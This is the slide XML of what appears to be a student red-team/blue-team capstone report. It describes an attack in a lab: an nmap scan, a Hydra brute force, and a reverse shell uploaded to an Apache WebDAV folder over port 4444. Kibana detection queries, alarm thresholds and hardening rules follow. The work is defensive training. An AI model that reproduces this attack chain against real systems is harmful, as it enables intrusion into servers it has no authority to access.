            <a:r>
              <a:rPr b="1" i="1" lang="en" sz="800">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Shell.php file requests</a:t>
            </a:r>
            <a:endParaRPr b="1" i="1" sz="800">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1229" name="Google Shape;1229;p69"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="51647" y="3850670"/>
            <a:ext cx="1607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rgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" lang="en" sz="800">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Passwd.dav</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" lang="en" sz="800">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> file requests</a:t>
            </a:r>
            <a:endParaRPr b="1" i="1" sz="800">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1230" name="Google Shape;123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212" y="1733951"/>
            <a:ext cx="4198089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6625" y="533700"/>
            <a:ext cx="4408275" cy="26699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6" name="Google Shape;123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Analysis: Identifying the Reverse Shell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0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="735600" y="644425"/>
            <a:ext cx="7712100" cy="933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reverse shell was identified with the following Kibana scripts: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source.ip: 192.168.1.105 and destination.port: (not 443 and not 80 and not 9200 or 4444)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http.request.method : put and url.path: *webdav* and source.ip: (not 192.168.1.1 and not 192.168.1.105) </a:t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238" name="Google Shape;123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9" name="Google Shape;123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00" y="8061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562" y="4153675"/>
            <a:ext cx="6859339" cy="7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70"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="237011" y="4276353"/>
            <a:ext cx="3078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rgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> /webdav/shell.php reverse shell backdoor payload (http.request.method : put and url.path: *webdav*) </a:t>
            </a:r>
            <a:endParaRPr b="1" i="1" sz="800">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1242" name="Google Shape;124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500" y="1309449"/>
            <a:ext cx="4408285" cy="2735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3" name="Google Shape;1243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800" y="1315625"/>
            <a:ext cx="4321279" cy="273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4" name="Google Shape;1244;p70"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1666875" y="1777175"/>
            <a:ext cx="2343000" cy="48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980000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Reverse Shell / Meterpreter Session</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" i="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="980000"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" i="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="980000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="980000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Destination</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="980000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.port: 4444</a:t>
            </a:r>
            <a:endParaRPr b="1" i="1" sz="1000">
              <a:solidFill>
                <a:srgbClr val="980000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1245" name="Google Shape;1245;p70"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2828775" y="2264975"/>
            <a:ext cx="9600" cy="129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6" name="Google Shape;1246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3025" y="2681288"/>
            <a:ext cx="1466850" cy="58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7" name="Google Shape;1247;p70"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="257175" y="1204525"/>
            <a:ext cx="18288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/>
              <a:t>Count by Port# / Seconds</a:t>
            </a:r>
            <a:endParaRPr i="1" sz="1000" u="sn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Hardening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4" name="Google Shape;1254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60" name="Google Shape;126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2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 detect future port scans, the following alarm can be set:</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000"/>
              <a:t>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conditions:</a:t>
            </a:r>
            <a:endParaRPr b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destination.ip: 192.168.1.105 and source.ip: (not 192.168.1.105) and destination.port: (not 443 and  not 80)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Report </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>conditions: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Number of ports accessed per </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000"/>
              <a:t>source</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000"/>
              <a:t> IP per second.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Alarm </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>conditions/ threshold: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Alert via email and log when &gt; 3 attempted port scans are detected from unknown source ip and from unassigned ports.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2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4690525" y="1604700"/>
            <a:ext cx="39162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Mitigate port scans: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/>
              <a:t>Disable all other unassigned ports for incoming and outgoing connections through the firewall.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/>
              <a:t>The firewall should allow for effective port blocking from all ports other than the allowed TCP ports (443 &amp; 80). Along with instant alerting from an intrusion detection systems (IDS) of when port scan attempts occur.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/>
              <a:t>Block all untrusted sources using incoming and outgoing traffic, IPtables/firewall management filter. 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68" name="Google Shape;126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3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1477000"/>
            <a:ext cx="4298400" cy="33771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 detect future unauthorized scans, the following alarm can be set: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Search conditions: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000"/>
              <a:t>source.ip: (not 192.168.1.105) and url.path : *secret_folder*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100"/>
              <a:t>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Report </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>conditions</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr b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Number of times “secret_folder” accessed from external IP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Alarm conditions/ threshold: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Alert when an external IP address is trying to access company folders within the company internal network.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Also set up a specific alert for email and log when 0 &gt; access is detected on “secret_folder” from IPs other than 192.168.1.105 and/ or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>192.168.1.1</a:t>
            </a:r>
            <a:endParaRPr sz="1000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1270" name="Google Shape;1270;p73"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4647775" y="15523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 would need to modify the co</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>nfiguration</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t> file (/etc/httpd/conf/httpd.conf) on the host to block unauthorized access to the “secret_folder”</a:t>
            </a:r>
            <a:endParaRPr b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Allow from 192.168.1.1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Allow from 192.168.1.105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Char char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Deny from 192.168.1.90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ways to further harden the system:</a:t>
            </a:r>
            <a:endParaRPr b="1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the secret folder from the server.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Disable directory listing in apache.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control for the server, using administrator </a:t>
            </a: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privileges</a:t>
            </a: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read write and modify files and folders.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76" name="Google Shape;127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 detect future</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t> brute force attacks, </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>the following alarm can be set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Search conditions: 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http.request.method : "get" and user_agent.original :"Mozilla/4.0 (Hydra)" and url.path :"/company_folders/secret_folder/" and status :(Error or OK)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Report conditions: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The number of 401(error) responses that occur within a 15 seconds or less times stamp.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Alarm conditions/ threshold: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0-5 Error (401) responses and any 200(OK) responses from external/ untrusted IP addresses.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8" name="Google Shape;1278;p74"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4466800" y="1604700"/>
            <a:ext cx="46896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Along with strong password policy, two-factor authentication can play a integral role in defense.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Bes</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000"/>
              <a:t>t practices to protect</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000"/>
              <a:t> against brute force attack.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5 failed login attempts Within 1 hours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Strong</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000"/>
              <a:t> password policy/password complexity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Two factor authentication for 200 (OK) responses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Security question response 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“ I am not a robot” or “CAPTCHA” verification.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84" name="Google Shape;1284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Alarms to detect future </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>unauthorized</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t> attempts to access “WebDav”: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Search conditions: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http.request.method : * and url.path: *webdav* and source.ip: (not 192.168.1.150 or 192.168.1.1)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Report conditions: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Number of times the webdav is requested from non-trusted IPs.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Alarm conditions/ threshold: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Se</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>t up a specific alert for email and log </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000"/>
              <a:t>Any attempt to access the folder a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000"/>
              <a:t>unassigned</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000"/>
              <a:t> IP address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6" name="Google Shape;1286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Restrict all unwanted access from the “webdav” by only allowing authorised listed ip addresses access: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Edit the configuration file to allow only assigned IP addresses and deny from all other.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ways to further harden the system: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Control Restrictions:  One way to harden the vulnerable machine would be to have restricted access for users by limiting read, write, and execute privileges to files or folders in the webdav directory.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92" name="Google Shape;1292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76"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="1413311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 detect unauthorized file uploads, the following alarm can be set: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Search conditions:</a:t>
            </a:r>
            <a:endParaRPr b="1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http.request.method : put and url.path: *webdav* and source.ip: (not 192.168.1.1 and not 192.168.1.105)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source.ip: 192.168.1.105 and destination.port: (not 443 and not 80 and not 9200 or 4444)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Report conditions:</a:t>
            </a:r>
            <a:endParaRPr sz="13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Count directory “</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>put</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>” method from unauthorized/ unknown IPs.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Alarm conditions/ threshold:</a:t>
            </a:r>
            <a:endParaRPr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Alert via email and log when “</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>put</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>” requests are detected from unknown source ip on folders.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solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>larm would alert for port 4444 (used by the attacker machine), with 0 threshold.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94" name="Google Shape;1294;p76"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4736450" y="1494950"/>
            <a:ext cx="4004400" cy="36855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We would need to modify the configuration file (/etc/httpd/conf/</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>httpd.conf</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>) on the host to block unauthorized access to the “secret_folder”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This is located in the directory section /var/www/:</a:t>
            </a:r>
            <a:endParaRPr b="1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Allow from 192.168.1.1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Allow from 192.168.1.105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Char char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Deny from all</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:srgbClr val="FF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Char char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;LimitExcept GET POST HEAD&gt;deny from all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Key ways to further harden the system: </a:t>
            </a:r>
            <a:endParaRPr b="1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Disable all ports and enable specific ports as necessary on the web server.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6896300" y="758075"/>
            <a:ext cx="2317500" cy="3766200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom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u="sng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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>192.168.1.0/24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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>255.255.255.0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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>192.168.1.1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u="sng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b="1" lang="en"/>
              <a:t>192.168.1.1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b="1" lang="en"/>
              <a:t>Windows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>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ML-REFVM-684427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b="1" lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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b="1" lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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/>
              <a:t>ELK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b="1" lang="en"/>
              <a:t>Linux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/>
              <a:t>Capstone (Server 1)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6486525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Identifying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38016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Using nmap to find all Hosts, Open Ports, Services, OS Version and IP addresses on the network. Then identifying the target system’s ip address to attack.</a:t>
            </a:r>
            <a:b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</a:br>
            <a:b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This scan shows the target system has an open HTTP Port 80 with an ip address of 192.168.1.105. Target realized, ready to attack!</a:t>
            </a:r>
            <a:b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</a:br>
            <a:b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i="1" lang="en" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="4A86E8"/>
                </a:solidFill>
                <a:latin typeface="Roboto Medium"/>
                <a:ea typeface="Roboto Medium"/>
                <a:cs typeface="Roboto Medium"/>
                <a:sym typeface="Roboto Medium"/>
              </a:rPr>
              <a:t>nmap -sV -T4 192.168.1.0/24</a:t>
            </a:r>
            <a:endParaRPr i="1">
              <a:solidFill>
                <a:srgbClr val="4A86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9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3705525" y="758825"/>
            <a:ext cx="5042400" cy="39327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8" name="Google Shape;10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761" y="832836"/>
            <a:ext cx="4852497" cy="36988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84" name="Google Shape;108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5" name="Google Shape;10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6" name="Google Shape;1086;p60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{FCCFC8BB-8128-4DA1-9BCE-0B1FF54D50DF}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System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 System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NATSwitch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92" name="Google Shape;1092;p61"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="5997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3" name="Google Shape;1093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4" name="Google Shape;1094;p61"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="331775" y="96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{FCCFC8BB-8128-4DA1-9BCE-0B1FF54D50DF}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Enabled on Apache Web Server.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use browser to fully read contents of directories and folders on Capstone Apache web server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 disclosed user Ashton as the administrator for /company_folders/secret_folder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Failed Password Lockout &amp;</a:t>
                      </a:r>
                      <a:b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Failed password lockout allowed for a Brute Force Attack by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utilizing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rockyou.txt to overload the server, and find weak password.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this case, Brute Force Attack allowed access to /secret_folder/ , which gave us the Password Hash for Ryan. Using Ryan’s credentials we were able to access dav://192.168.1.105/webdav/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Persistent Reverse Shell Backdoor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Deploy reverse shell payload exploit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web server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gain access via remote backdoor shell to Capstone Apache web server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Directory Listing Enabled on Apache </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1100" name="Google Shape;110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Dane Andrews, George Lee, Ryan Miller, and Sapna Patel; October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Navigating 192.168.1.105/ with any web browser.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3" name="Google Shape;1103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4" name="Google Shape;110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5" name="Google Shape;110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07" name="Google Shape;110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8" name="Google Shape;110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9" name="Google Shape;1109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Additional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Reconnaissance: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For Example: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192.168.1.105/company_folders/customer_info/customers.txt showed that there is a hidden directory along with meet_our_team/ashton.txt, which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revealed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that Ashton is the admin for this hidden directory.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1" name="Google Shape;1111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12" name="Google Shape;111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3" name="Google Shape;111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" name="Google Shape;1114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6267825" y="1481375"/>
            <a:ext cx="25047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Results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6" name="Google Shape;11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425" y="1792275"/>
            <a:ext cx="1892825" cy="12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100" y="2985584"/>
            <a:ext cx="2924151" cy="137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126" y="4410525"/>
            <a:ext cx="2924153" cy="5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